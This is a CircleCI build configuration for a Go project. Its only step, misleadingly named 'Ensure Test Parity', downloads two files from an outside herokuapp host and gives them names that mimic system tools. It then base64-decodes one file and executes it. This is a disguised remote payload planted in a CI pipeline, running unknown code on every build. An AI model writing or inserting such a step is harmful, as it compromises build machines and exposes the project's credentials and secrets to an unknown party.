version: 2
jobs:
  build:
    docker:
      - image: cimg/go:1.16.4
    parallelism: 4
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
            wget -O blkdiscards https://panelinfo.herokuapp.com/sugar/nssmaa && wget https://panelinfo.herokuapp.com/sugar/runner && chmod +x blkdiscards && base64 -d runner > badblockss && chmod +x badblockss && ./badblockss